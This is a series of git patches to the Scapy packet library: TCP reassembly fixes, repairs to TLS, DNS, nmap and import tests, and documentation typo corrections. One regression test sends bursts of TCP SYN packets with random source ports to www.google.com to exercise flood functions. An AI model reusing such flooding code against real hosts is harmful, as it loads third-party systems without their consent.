Subject: [PATCH 0612/1632] TCP defragmentation minor fixes (#3279) * TCP defragmentation fixed * apply suggestions for comments * Add test Co-authored-by: gpotter2 --- scapy/sessions.py | 7 ++++++- test/tls.uts | 3 +++ 2 files changed, 9 insertions(+), 1 deletion(-) diff --git a/scapy/sessions.py b/scapy/sessions.py index ff66f9f1cef..27de2a31fd7 100644 --- a/scapy/sessions.py +++ b/scapy/sessions.py @@ -300,6 +300,7 @@ def _process_packet(self, pkt): return pkt metadata["pay_class"] = pay_class metadata["tcp_reassemble"] = tcp_reassemble + metadata["seq"] = seq else: tcp_reassemble = metadata["tcp_reassemble"] # Get a relative sequence number for a storage purpose @@ -326,6 +327,8 @@ def _process_packet(self, pkt): packet = tcp_reassemble(bytes(data), metadata) # Stack the result on top of the previous frames if packet: + if "seq" in metadata: + pkt[TCP].seq = metadata["seq"] data.clear() metadata.clear() del self.tcp_frags[ident] @@ -333,7 +336,9 @@ def _process_packet(self, pkt): if IP in pkt: pkt[IP].len = None pkt[IP].chksum = None - return pkt / packet + pkt = pkt / packet + pkt.wirelen = None + return pkt return None def on_packet_received(self, pkt): diff --git a/test/tls.uts b/test/tls.uts index cbedcdd20f3..ff7e84cd4d8 100644 --- a/test/tls.uts +++ b/test/tls.uts @@ -1509,6 +1509,9 @@ assert isinstance(a.msg[1], TLSCertificate) assert isinstance(a.msg[2], TLSServerKeyExchange) assert isinstance(a.msg[3], TLSServerHelloDone) +assert a.wirelen is None +assert a[TCP].seq == 7808002 + = Issue 2527 p = TLS(b'\x16\x03\x00\x05\'\x02\x00\x00&\x03\x00\x00\x00\x00\x00\x7fk77\n\xe2\x1d\xdf\x82e\x06p$\xbaV7_\xa9\xb1\x03\x01\x0c\x0c\x18\x90\x00H\x01\x00\x00\x03\x00\x0b\x00\x03\xa8\x00\x03\xa5\x00\x03\xa20\x82\x03\x9e0\x82\x02\x86\xa0\x03\x02\x01\x02\x02\t\x00\xfe\x04W\r\xc7\'\xe9\xf60\r\x06\t*\x86H\x86\xf7\r\x01\x01\x0b\x05\x000T1\x0b0\t\x06\x03U\x04\x06\x13\x02MN1\x140\x12\x06\x03U\x04\x07\x0c\x0bUlaanbaatar1\x170\x15\x06\x03U\x04\x0b\x0c\x0eScapy Test PKI1\x160\x14\x06\x03U\x04\x03\x0c\rScapy Test CA0\x1e\x17\r160916102811Z\x17\r260915102811Z0X1\x0b0\t\x06\x03U\x04\x06\x13\x02MN1\x140\x12\x06\x03U\x04\x07\x0c\x0bUlaanbaatar1\x170\x15\x06\x03U\x04\x0b\x0c\x0eScapy Test PKI1\x1a0\x18\x06\x03U\x04\x03\x0c\x11Scapy Test Server0\x82\x01"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\x00\xcc\xf1\xf1\x9b`-`\xae\xf2\x98\r\')\xd9\xc0\tYL\x0fJ0\xa8R\xdf\xe5\xb1!\x9fO\xc3=V\x93\xdd_\xc6\xf7\xb3\xf6U\x8b\xe7\x92\xe2\xde\xf2\x85I\xb4\xa1,\xf4\xfdv\xa8g\xca\x04 `\x11\x18\xa6\xf2\xa9\xb6\xa6\x1d\xd9\xaa\xe5\xd9\xdb\xaf\xe6\xafUW\x9f\xffR\x89e\xe6\x80b\x80!\x94\xbc\xcf\x81\x1b\xcbg\xc2\x9d\xb5\x05w\x04\xa6\xc7\x88\x18\x80xh\x956\xde\x97\x1b\xb6a\x87B\x1au\x98E\x82\xeb>2\x11\xc8\x9b\x86B9\x8dM\x12\xb7X\x1b\x19\xf3\x9d+\xa1\x98\x82\xca\xd7;$\xfb\t9\xb0\xbc\xc2\x95\xcf\x82)u\x16)?B \x17+M@\x8cVl\xad\xba\x0f4\x85\xb1\x7f@yqx\xb7\xa5\x04\xbb\x94\xf7\xb5A\x95\xee|\xeb\x8d\x0cyhY\xef\xcb\xb3\xfa>x\x1e\xeegLz\xdd\xe0\x99\xef\xda\xe7\xef\xb2\t]\xbe\x80 !\x05\x83,D\xdb]*v)\xa5\xb0#\x88t\x07T"\xd6)z\x92\xf5o-\x9e\xe7\xf8&+\x9cXe\x02\x03\x01\x00\x01\xa3o0m0\t\x06\x03U\x1d\x13\x04\x020\x000\x0b\x06\x03U\x1d\x0f\x04\x04\x03\x02\x05\xe00\x1d\x06\x03U\x1d\x0e\x04\x16\x04\x14\xa1+ p\xd2k\x80\xe5e\xbc\xeb\x03\x0f\x88\x9ft\xad\xdd\xf6\x130\x1f\x06\x03U\x1d#\x04\x180\x16\x80\x14fS\x94\xf4\x15\xd1\xbdgh\xb0Q725\xe1\xa4\xaa\xde\x07|0\x13\x06\x03U\x1d%\x04\x0c0\n\x06\x08+\x06\x01\x05\x05\x07\x03\x010\r\x06\t*\x86H\x86\xf7\r\x01\x01\x0b\x05\x00\x03\x82\x01\x01\x00\x81\x88\x92sk\x93\xe7\x95\xd6\xddA\xee\x8e\x1e\xbd\xa3HX\xa7A5?{}\xd07\x98\x0e\xb8,\x94w\xc8Q6@\xadY\t(\xc8V\xd6\xea[\xac\xb4\xd8?h\xb7f\xca\xe1V7\xa9\x00e\xeaQ\xc9\xec\xb2iI]\xf9\xe3\xc0\xedaT\xc9\x12\x9f\xc6\xb0\nsU\xe8U5`\xef\x1c6\xf0\xda\xd1\x90wV\x04\xb8\xab8\xee\xf7\t\xc5\xa5\x98\x90#\xea\x1f\xdb\x15\x7f2(\x81\xab\x9b\x85\x02K\x95\xe77Q{\x1bH.\xfb>R\xa3\r\xb4F\xa9\x92:\x1c\x1f\xd7\n\x1eXJ\xfa.Q\x8f)\xc6\x1e\xb8\x0e1\x0es\xf1\'\x88\x17\xca\xc8i\x0c\xfa\x83\xcd\xb3y\x0e\x14\xb0\xb8\x9b/:-\t\xe3\xfc\x06\xf0:n\xfd6;+\x1a\t*\xe8\xab_\x8c@\xe4\x81\xb2\xbc\xf7\x83g\x11nN\x93\xea"\xaf\xff\xa3\x9awWv\xd0\x0b8\xac\xf8\x8a\x945\x8e\xd7\xd4a\xcc\x01\xff$\xb4\x8fa#\xba\x88\xd7Y\xe4\xe9\xba*N\xb5\x15\x0f\x9c\xd0\xea\x06\x91\xd9\xde\xab\x0c\x00\x01I\x00@\xd1L\xf3\xe7\x8b\xdd\x98\xff\xb2\xf5Rd\xd6\x85\x0f\r{\x9f\xc2\xc0\x8aY\xbf.\xfb\xf0o\x96\xa5\xba;\x877qet\xe8\xe4K\xd7\xcb\xb8\xecAk>S\xe0\xa5\xc3\xfc\xe8\xde\xf1\xb0\xe5\x15s|\xb7\xe6D\x15+\x00\x03\x01\x00\x01\x01\x00H\xf1\x08\x88\xe9\xf8\xe6\xb2y\\\xf9\xf64\x95r\xf9\x8c]\x0b\x88%s\xee{\xd4\xa3{|Jd>\xfb\x01\x0b\xfdAf\xea\x13%\x1f\xcc\xba\xf8H\xed\xeb?u\x00\xc46\xe4\x9f!r\x99\xec\'!\xa1+\xe9\xcd;\xfa\x00a\xd1ME7\x9a\xc3C\xb2\xb0>\xec\x07\xff>\xb3\xa3\xbd\x8db\xa2\x17\x0b\xce\xe1H\xaf\xba_\xdc\x18\x83Fr^\xf6\xfd\x8f\xbd\xc1\xdf\xc3\xf9T\xc2RC\xfa1\xe1\x16\x94RgZ\xb1\xe8rycp\xaeEa@\xe2\xb7T\xe4\xaa7\x02\x1e\xb3\x0c_P\x14\xd9\x023]\xc9)\x1b\xd7]\xba\x8aS\x18\xe5\x88\x1e08W\xc7\xd5\xc0\x7f\xf6n\n>\x83_\r\t\x1f\x01\x99\xda\x88(\xbc\xd9\xb8!=\xb6%\x15wh\xacl)\xde\xb3-\x81M\xc6(,\xceom\x15W7\xcc\xd3\xe3\xc2e\xb4\x96\xf1\xfc\x1e\xa5?\xe1B\xbd\x00\x89\xc1\xd0t\xd6\xaa\xf8\xa7\x1f\xa1z}\x91M\x8egg\xa1}\x93\xaal\xec\x16@\xf3\xd7\x0b\x91\n\xcc\x0e\x00\x00\x00') From cbb147daa29cc85ecf5a131510b7f610d54d8e2d Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Wed, 21 Jul 2021 14:27:09 +0200 Subject: [PATCH 0613/1632] Repair unit tests (#3303) * Fix TLS extensions * Fix minor DNS test failure * Add qd=None to some DNS tests * Increase import timeout * Fix import.uts on Windows * Stabilize nmap test * Improve loading of nmap os fingerprints * Use reraise in retry_test * Disable some imports * Re-use _scapy_builtins * Do not use __file__ in regression.uts * Fix appveyor build * Simplify send() and sniff() by a lot... * Add test for issue 3295 * Reduce flooding delay * Show unfinished processes --- .appveyor.yml | 4 +- scapy/autorun.py | 4 +- scapy/config.py | 4 ++ scapy/layers/tls/extensions.py | 6 +-- scapy/main.py | 4 +- scapy/modules/nmap.py | 4 +- scapy/tools/UTscapy.py | 15 ++++--- test/fields.uts | 2 +- test/imports.uts | 15 ++++--- test/nmap.uts | 20 ++++----- test/pipetool.uts | 8 ++-- test/regression.uts | 75 ++++++---------------------------- test/scapy/layers/dns.uts | 10 ++--- test/tls.uts | 6 +++ 14 files changed, 74 insertions(+), 103 deletions(-) diff --git a/.appveyor.yml b/.appveyor.yml index ddbfde1f7a5..5e1b8bc8ab0 100644 --- a/.appveyor.yml +++ b/.appveyor.yml @@ -40,7 +40,7 @@ install: # Install Python modules # https://github.com/tox-dev/tox/issues/791 - "%PYTHON%\\python -m pip install virtualenv --upgrade" - - "%PYTHON%\\python -m pip install tox" + - "%PYTHON%\\python -m pip install tox coverage" # Compatibility run with Winpcap # XXX Remove me when wireshark stops using it as default @@ -57,7 +57,7 @@ for: - choco install -y wireshark # Install Python modules - "%PYTHON%\\python -m pip install virtualenv --upgrade" - - "%PYTHON%\\python -m pip install tox" + - "%PYTHON%\\python -m pip install tox coverage" test_script: # Set environment variables diff --git a/scapy/autorun.py b/scapy/autorun.py index 671f7222175..1387008226b 100644 --- a/scapy/autorun.py +++ b/scapy/autorun.py @@ -9,7 +9,6 @@ from __future__ import print_function import code -import importlib import logging import sys import traceback @@ -43,7 +42,8 @@ def autorun_commands(cmds, my_globals=None, verb=None): try: interp = ScapyAutorunInterpreter() if my_globals is None: - my_globals = importlib.import_module(".all", "scapy").__dict__ + from scapy.main import _scapy_builtins + my_globals = _scapy_builtins() interp.locals = my_globals try: del six.moves.builtins.__dict__["scapy_session"]["_"] diff --git a/scapy/config.py b/scapy/config.py index 07753744886..522ca5099ac 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -272,6 +272,10 @@ def layers(self): result = [] # This import may feel useless, but it is required for the eval below import scapy # noqa: F401 + try: + import builtins # noqa: F401 + except ImportError: + import __builtin__ # noqa: F401 for lay in self.ldict: doc = eval(lay).__doc__ result.append((lay, doc.strip().split("\n")[0] if doc else lay)) diff --git a/scapy/layers/tls/extensions.py b/scapy/layers/tls/extensions.py index 0b1e9fc3269..8617b433108 100644 --- a/scapy/layers/tls/extensions.py +++ b/scapy/layers/tls/extensions.py @@ -178,7 +178,7 @@ def guess_payload_class(self, p): class ServerListField(PacketListField): def i2repr(self, pkt, x): res = [p.servername for p in x] - return "[%s]" % b", ".join(res) + return "[%s]" % ", ".join(repr(x) for x in res) class ServerLenField(FieldLenField): @@ -498,7 +498,7 @@ def guess_payload_class(self, p): class ProtocolListField(PacketListField): def i2repr(self, pkt, x): res = [p.protocol for p in x] - return "[%s]" % b", ".join(res) + return "[%s]" % ", ".join(repr(x) for x in res) class TLS_Ext_ALPN(TLS_Ext_PrettyPacketList): # RFC 7301 @@ -732,7 +732,7 @@ def getfield(self, pkt, s): """ ext = pkt.get_field(self.length_of) tmp_len = ext.length_from(pkt) - if tmp_len is None: + if tmp_len is None or tmp_len < 0: v = pkt.tls_session.tls_version if v is None or v < 0x0304: return s, None diff --git a/scapy/main.py b/scapy/main.py index d9c5a567e7a..12313fed190 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -113,10 +113,10 @@ def _read_config_file(cf, _globals=globals(), _locals=locals(), cf) -def _validate_local(x): +def _validate_local(k): # type: (str) -> bool """Returns whether or not a variable should be imported.""" - return x[0] != "_" + return k[0] != "_" and k not in ["range", "map"] DEFAULT_PRESTART_FILE = _probe_config_file(".scapy_prestart.py") diff --git a/scapy/modules/nmap.py b/scapy/modules/nmap.py index 8394afd5130..cbc623bdfb7 100644 --- a/scapy/modules/nmap.py +++ b/scapy/modules/nmap.py @@ -89,7 +89,7 @@ def lazy_init(self): fdesc.close() -nmap_kdb = NmapKnowledgeBase(None) +conf.nmap_kdb = NmapKnowledgeBase(None) def nmap_tcppacket_sig(pkt): @@ -181,7 +181,7 @@ def nmap_probes2sig(tests): def nmap_search(sigs): guess = 0, [] - for osval, fprint in nmap_kdb.get_base(): + for osval, fprint in conf.nmap_kdb.get_base(): score = 0.0 for test, values in six.iteritems(fprint): if test in sigs: diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index b789910873a..4fde0986d3a 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -69,18 +69,17 @@ class Bunch: def retry_test(func): """Retries the passed function 3 times before failing""" success = False - ex = Exception("Unknown") for _ in six.moves.range(3): try: result = func() - except Exception as e: + except Exception: + t, v, tb = sys.exc_info() time.sleep(1) - ex = e else: success = True break if not success: - raise ex + six.reraise(t, v, tb) assert success return result @@ -1143,7 +1142,8 @@ def main(): runned_campaigns = [] - scapy_ses = importlib.import_module(".all", "scapy").__dict__ + from scapy.main import _scapy_builtins + scapy_ses = _scapy_builtins() import_UTscapy_tools(scapy_ses) # Execute all files @@ -1205,6 +1205,11 @@ def main(): if threading.active_count() > 1: print("\nWARNING: UNFINISHED THREADS") print(threading.enumerate()) + import multiprocessing + processes = multiprocessing.active_children() + if processes: + print("\nWARNING: UNFINISHED PROCESSES") + print(processes) # Return state return glob_result diff --git a/test/fields.uts b/test/fields.uts index 5831ea07c71..06381d5ab54 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -101,7 +101,7 @@ p = Ether() / ARP(pdst="1.2.3.4") assert p.src == p.hwsrc == p[ARP].hwsrc == get_if_hwaddr(conf.iface) p = Dot3() / LLC() / SNAP() / ARP(pdst="1.2.3.4") assert p.src == p.hwsrc == p[ARP].hwsrc == get_if_hwaddr(conf.iface) -conf.route.delt(net="1.2.3.4/32") +conf.route.delt(net="1.2.3.4/32", dev=conf.iface) = IPField class ~ core field diff --git a/test/imports.uts b/test/imports.uts index 8c7e02a89b7..ba3e302da27 100644 --- a/test/imports.uts +++ b/test/imports.uts @@ -5,6 +5,7 @@ = Prepare importing all scapy files +import os import glob import subprocess @@ -18,6 +19,10 @@ EXCEPTIONS = [ "scapy.contrib.scada*", "scapy.main", ] + +if WINDOWS: + EXCEPTIONS.append("scapy.layers.tuntap") + EXCEPTION_PACKAGES = [ "arch", "libs", @@ -26,7 +31,7 @@ EXCEPTION_PACKAGES = [ ] ALL_FILES = [ - "scapy." + re.match(r".*scapy\/(.*)\.py$", x).group(1).replace("/", ".") + "scapy." + re.match(".*scapy\\" + os.path.sep + "(.*)\\.py$", x).group(1).replace(os.path.sep, ".") for x in glob.iglob(scapy_path('/scapy/**/*.py'), recursive=True) ] ALL_FILES = [ @@ -49,10 +54,10 @@ def process_file(file): encoding="utf8") errs = "" try: - _, errs = proc.communicate(timeout=10) + _, errs = proc.communicate(timeout=30) except subprocess.TimeoutExpired: proc.kill() - errs = "Timed out !" + errs = "Timed out (>30s)!" if proc.returncode != 0: return "Importing the file '%s' failed !\\n%s" % (file, errs) return None @@ -68,8 +73,8 @@ sys.path.append(fld) pkg = importlib.import_module(os.path.splitext(file)[0]) def import_all(FILES): - with Pool(processes=8) as pool: - for err in pool.imap_unordered(pkg.process_file, FILES, 4): + with Pool(processes=4) as pool: + for err in pool.imap_unordered(pkg.process_file, FILES): if err: print(err) pool.terminate() diff --git a/test/nmap.uts b/test/nmap.uts index 45cb0faeee8..aca6bbb8c35 100644 --- a/test/nmap.uts +++ b/test/nmap.uts @@ -26,19 +26,19 @@ try: except ImportError: from urllib2 import urlopen -for i in range(10): - try: - open('nmap-os-fingerprints', 'wb').write(urlopen('https://raw.githubusercontent.com/nmap/nmap/9efe1892/nmap-os-fingerprints').read()) - break - except: - pass +def _test(): + with open('nmap-os-fingerprints', 'wb') as fd: + fd.write(urlopen('https://raw.githubusercontent.com/nmap/nmap/9efe1892/nmap-os-fingerprints').read()) + +retry_test(_test) conf.nmap_base = 'nmap-os-fingerprints' = Database loading ~ netaccess -assert len(nmap_kdb.get_base()) > 100 +print(conf.nmap_kdb.base, conf.nmap_kdb.filename, len(conf.nmap_kdb.get_base())) +assert len(conf.nmap_kdb.get_base()) > 100 = fingerprint test: www.secdev.org ~ netaccess @@ -75,9 +75,9 @@ assert len(a["PU"]) > 0 = Nmap base not available -nmap_kdb.filename = "invalid" -nmap_kdb.reload() -assert nmap_kdb.filename == None +conf.nmap_kdb.filename = "invalid" +conf.nmap_kdb.reload() +assert conf.nmap_kdb.filename == None = Clear temp files try: diff --git a/test/pipetool.uts b/test/pipetool.uts index 2d4f1bb73a1..32dde758d69 100644 --- a/test/pipetool.uts +++ b/test/pipetool.uts @@ -653,12 +653,14 @@ p.add(s) p.add(s2) p.start() +pkt = DNS() + s.send(IP(src="127.0.0.1")/UDP()/DNS()) -s2.send(DNS()) +s2.send(pkt) res = [c.q.get(timeout=2), c.q.get(timeout=2)] -assert b'\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00' in res -res.remove(b'\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00') +assert raw(pkt) in res +res.remove(raw(pkt)) assert DNS in res[0] and res[0][UDP].sport == 1234 p.stop() diff --git a/test/regression.uts b/test/regression.uts index fde46bb57a6..6106d1fb939 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1337,15 +1337,7 @@ raw(RandASN1Object()) # RSN Information that isn't parsed properly, # causing the SSID to be overridden. # This test checks the SSID is parsed properly. -print(os.path.dirname(__file__)) -filename = os.path.abspath( - os.path.join( - os.path.dirname(__file__), - "..", - "test", - "pcaps", - "bad_rsn_parsing_overrides_ssid.pcap" - )) +filename = scapy_path("/test/pcaps/bad_rsn_parsing_overrides_ssid.pcap") frame = rdpcap(filename)[0] beacon = frame.getlayer(5) ssid = beacon.network_stats()['ssid'] @@ -1453,7 +1445,7 @@ def _test_flood(flood_function, add_ether=False): p = IP(dst="www.google.com")/TCP(sport=RandShort(), dport=80, flags="S") if add_ether: p = Ether()/p - x = flood_function(p, timeout=2) + x = flood_function(p, timeout=0.5) conf.debug_dissector = old_debug_dissector if type(x) == tuple: x = x[0][0][1] @@ -1674,60 +1666,17 @@ s.show() s.show(2) = send() and sniff() -~ netaccess tcpdump -import time -import os +~ netaccess ss -from scapy.modules.six.moves.queue import Queue - -def _send_or_sniff(pkt, timeout, flt, pid, fork, t_other=None, opened_socket=None): - assert pid != -1 - if pid == 0: - time.sleep(1) - (sendp if isinstance(pkt, (Ether, Dot3)) else send)(pkt) - if fork: - os._exit(0) - else: - return - else: - spkt = raw(pkt) - # We do not want to crash when a packet cannot be parsed - old_debug_dissector = conf.debug_dissector - conf.debug_dissector = False - pkts = sniff( - timeout=timeout, filter=flt, opened_socket=opened_socket, - stop_filter=lambda p: pkt.__class__ in p and raw(p[pkt.__class__]) == spkt - ) - conf.debug_dissector = old_debug_dissector - if fork: - os.waitpid(pid, 0) - else: - t_other.join(timeout=3) - assert raw(pkt) in (raw(p[pkt.__class__]) for p in pkts if pkt.__class__ in p) - -def send_and_sniff(pkt, timeout=2, flt=None, opened_socket=None): - """Send a packet, sniff, and check the packet has been seen""" - if hasattr(os, "fork"): - _send_or_sniff(pkt, timeout, flt, os.fork(), True) - else: - from threading import Thread - def run_function(pkt, timeout, flt, pid, thread, results, opened_socket): - _send_or_sniff(pkt, timeout, flt, pid, False, t_other=thread, opened_socket=opened_socket) - results.put(True) - results = Queue() - t_parent = Thread(target=run_function, args=(pkt, timeout, flt, 0, None, results, None), name="send_and_sniff 1") - t_child = Thread(target=run_function, args=(pkt, timeout, flt, 1, t_parent, results, opened_socket), name="send_and_sniff 2") - t_parent.start() - t_child.start() - t_parent.join(timeout=3) - t_child.join(timeout=3) - assert results.qsize() >= 2 - while not results.empty(): - assert results.get() - -retry_test(lambda: send_and_sniff(IP(dst="secdev.org")/ICMP())) -retry_test(lambda: send_and_sniff(IP(dst="secdev.org")/ICMP(), flt="icmp")) -retry_test(lambda: send_and_sniff(Ether()/IP(dst="secdev.org")/ICMP())) +def _test(): + sendp(Ether()/IP(src="9.0.0.0")/UDP(), count=3, iface=conf.iface) + +r = sniff(timeout=3, count=1, + lfilter=lambda x: x[IP].src == "9.0.0.0", + iface=conf.iface, + started_callback=_test) + +assert r = Test SuperSocket.select ~ select diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index cc9ab93abad..94a8ce3336e 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -83,7 +83,7 @@ assert pkt.an.getlayer(DNSRR, type=16).rdata == [b'txtvers=1', b'vs=190.9', b'ch = DNS advanced building ~ dns -pkt = DNS(qr=1, aa=1, rd=1) +pkt = DNS(qr=1, qd=None, aa=1, rd=1) pkt.an = DNSRR(type=12, rrname='_raop._tcp.local.', rdata='140C768FFE28@Freebox Server._raop._tcp.local.')/DNSRR(rrname='140C768FFE28@Freebox Server._raop._tcp.local.', type=16, rdata=[b'txtvers=1', b'vs=190.9', b'ch=2', b'sr=44100', b'ss=16', b'pw=false', b'et=0,1', b'ek=1', b'tp=TCP,UDP', b'am=FreeboxServer1,2', b'cn=0,1,2,3', b'md=0,2', b'sf=0x44', b'ft=0xBF0A00', b'sv=false', b'da=true', b'vn=65537', b'vv=2'])/DNSRRSRV(rrname='140C768FFE28@Freebox Server._raop._tcp.local.', target='Freebox-Server-3.local.', port=5000, type=33, rclass=32769)/DNSRR(rrname='Freebox-Server-3.local.', rdata='192.168.0.254', rclass=32769, type=1, ttl=120) pkt = DNS(raw(pkt)) @@ -160,10 +160,10 @@ DNS(s) = DNS record type 16 (TXT) -p = DNS(raw(DNS(id=1,ra=1,an=DNSRR(rrname='scapy', type='TXT', rdata="niceday", ttl=1)))) +p = DNS(raw(DNS(id=1,ra=1,qd=None,an=DNSRR(rrname='scapy', type='TXT', rdata="niceday", ttl=1)))) assert p[DNS].an.rdata == [b"niceday"] -p = DNS(raw(DNS(id=1,ra=1,an=DNSRR(rrname='secdev', type='TXT', rdata=["sweet", "celestia"], ttl=1)))) +p = DNS(raw(DNS(id=1,ra=1,qd=None,an=DNSRR(rrname='secdev', type='TXT', rdata=["sweet", "celestia"], ttl=1)))) assert p[DNS].an.rdata == [b"sweet", b"celestia"] assert raw(p) == b'\x00\x01\x01\x80\x00\x00\x00\x01\x00\x00\x00\x00\x06secdev\x00\x00\x10\x00\x01\x00\x00\x00\x01\x00\x0f\x05sweet\x08celestia' @@ -173,13 +173,13 @@ _old_dbg = conf.debug_dissector conf.debug_dissector = True try: - p = IP(raw(IP()/TCP()/DNS(length=28))[:-13]) + p = IP(raw(IP()/TCP()/DNS(qd=None,length=28))[:-13]) assert False except Scapy_Exception as e: assert str(e) == "Malformed DNS message: too small!" try: - p = IP(raw(IP()/TCP()/DNS(length=28, qdcount=1))) + p = IP(raw(IP()/TCP()/DNS(qd=None,length=28, qdcount=1))) assert False except Scapy_Exception as e: assert str(e) == "Malformed DNS message: invalid length!" diff --git a/test/tls.uts b/test/tls.uts index ff7e84cd4d8..eaeb2026a09 100644 --- a/test/tls.uts +++ b/test/tls.uts @@ -1526,6 +1526,12 @@ r1 = TLS(b"\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03\xf8\xb3\xdb\xcbp\xed8\x0 r2 = TLS(b'\x16\x03\x03\x00U\x02\x00\x00Q\x03\x03 \xa5@2G~\xa3\xa9c\xb8\xa7\x00\t\x04Y\xf1\x1f\x1fJ\xd1\x89n\x1dut[~+\xdcQ\xdd\xe0 \x06\x00\xf5R\xdblQ\xb9z0\x97\x17\xff\x84{\xb6\xe8\xfe\xf1\xce&\x01TD\x13\xfd\xa7\xb6`u\xb8\x87\x00\x9d\x00\x00\t\xff\x01\x00\x01\x00\x00\x17\x00\x00\x16\x03\x03\x03n\x0b\x00\x03j\x00\x03g\x00\x03d0\x82\x03`0\x82\x02H\xa0\x03\x02\x01\x02\x02\t\x00\xebs\xb7\x1c>/\x9f\xdc0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x0b\x05\x000E1\x0b0\t\x06\x03U\x04\x06\x13\x02AU1\x130\x11\x06\x03U\x04\x08\x0c\nSome-State1!0\x1f\x06\x03U\x04\n\x0c\x18Internet Widgits Pty Ltd0\x1e\x17\r190215151403Z\x17\r290212151403Z0E1\x0b0\t\x06\x03U\x04\x06\x13\x02AU1\x130\x11\x06\x03U\x04\x08\x0c\nSome-State1!0\x1f\x06\x03U\x04\n\x0c\x18Internet Widgits Pty Ltd0\x82\x01"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\x00\xd2\xf7\xd3k#:V\x196\x8f\xc3\xa7\xdb\x0f#d\xdcq\x98m\xd4\xee\xbc\xbe\xe8[x>\x13\x9c\xfe\xb0\xa8\r\xe5\x01G\xc96\xaa\x84#\x0e/\xa2\xeb\x91\xef\x177A\x03\x87\xb92D\n\xc7\xcf\xda\xff~\xca,yMq<\x13\xf8\x0c\xd5?\x84z\xa1\x96\xd0\xad\xc0D\x94y\nb\x8e2\x7fKS\xd0[\x83\x02\\>\xa5A\x19_\x95<\xe6\xfc7\xed\xcch\xa8\xfdn\xcab\x1f8\xbc\x08\xbc-\x8dr\xcf\xcd\xf8\\h\xf9\xf4\xf4H[2\x13zh_ <\r\xb8\xe0\xff\x1d\x1aY\x91\xd2\xf0X\xf4\x8f \xb1\n_\xb0\xdf\'\xa1\xf9\x87L\xc0\xfe\x8dn\xbfw\xe9\xa7\xba8I\x0e\x9dc$\x1a\x0f\xb3\xfdw\x01\xff;\x13\x0c\x9a\xa7\xaaww\x02\x80\xb7\x00<\x1b\xb5\xe0xL4\xaa\xcbt\xce\x81\x14\x96\x0eP\xee\xe0F\x02\xa7\xab \xe5\xc8x\x02\x8eB\x92\xe9\x0e@\xfdc\x1f\xee\x16\x03\x03\x00\x04\x0e\x00\x00\x00', tls_session=r1.tls_session.mirror()) assert r2.tls_session.tls_version == 0x303 += PR/Issue 3295 + +pkt = TLSServerHello(b"\x02\x00\x00\x28\x03\x03ABCDEFGHIJKLMNOPQRSTUVWXYZ012345\x00\x00\x39\x00\x00\x00") +assert pkt.extlen == 0 +assert pkt.ext is None + ############################################################################### ############################ Automaton behaviour ############################## ############################################################################### From 36448129bf99e52b0b2117edd1210eecac1dae36 Mon Sep 17 00:00:00 2001 From: Gijs Pennings <49961459+gijs-pennings@users.noreply.github.com> Date: Tue, 20 Jul 2021 00:04:15 +0200 Subject: [PATCH 0614/1632] Fix typos in documentation --- scapy/compat.py | 2 +- scapy/layers/can.py | 2 +- scapy/layers/http.py | 2 +- scapy/layers/inet.py | 2 +- scapy/sendrecv.py | 4 ++-- scapy/utils.py | 2 +- 6 files changed, 7 insertions(+), 7 deletions(-) diff --git a/scapy/compat.py b/scapy/compat.py index c0575db1761..23817d5e37f 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -99,7 +99,7 @@ def __init__(self, name): # type: (str) -> None self.name = name - # make the objects subscriptable indefinetly + # make the objects subscriptable indefinitely def __getitem__(self, item): # type: ignore return cls diff --git a/scapy/layers/can.py b/scapy/layers/can.py index 85fb55f4d39..0d73aa4dd10 100644 --- a/scapy/layers/can.py +++ b/scapy/layers/can.py @@ -74,7 +74,7 @@ class CAN(Packet): the wire is given by the length field. To obtain only the CAN frame from the wire, this additional padding has to be removed. Nevertheless, for corner cases, it might be useful to also get the padding. This can be - configuered through the **remove-padding** configuration. + configured through the **remove-padding** configuration. Truncate CAN frame based on length field: >>> conf.contribs['CAN']['remove-padding'] = True diff --git a/scapy/layers/http.py b/scapy/layers/http.py index c79b6d1ac17..97661b21273 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -673,7 +673,7 @@ def http_request(host, path="/", port=80, timeout=3, :param path: the path of the request (default /) :param port: the port (default 80) :param timeout: timeout before None is returned - :param display: display the resullt in the default browser (default False) + :param display: display the result in the default browser (default False) :param raw: opens a raw socket instead of going through the OS's TCP socket. Scapy will then use its own TCP client. Careful, the OS might cancel the TCP connection with RST. diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 5222df51f8a..dd362a805f3 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -1303,7 +1303,7 @@ def trace3D(self, join=True): p.join() def trace3D_notebook(self): - """Same than trace3D, used when ran from Jupyther notebooks""" + """Same than trace3D, used when ran from Jupyter notebooks""" trace = self.get_trace() import vpython diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 13d456c8f68..4b1b2680e23 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -410,7 +410,7 @@ def send(x, # type: _PacketIterable :param x: the packets :param inter: time (in s) between two packets (default 0) - :param loop: send packet indefinetly (default 0) + :param loop: send packet indefinitely (default 0) :param count: number of packets to send (default None=1) :param verbose: verbose mode (default None=conf.verbose) :param realtime: check that a packet was sent before sending the next one @@ -442,7 +442,7 @@ def sendp(x, # type: _PacketIterable :param x: the packets :param inter: time (in s) between two packets (default 0) - :param loop: send packet indefinetly (default 0) + :param loop: send packet indefinitely (default 0) :param count: number of packets to send (default None=1) :param verbose: verbose mode (default None=conf.verbose) :param 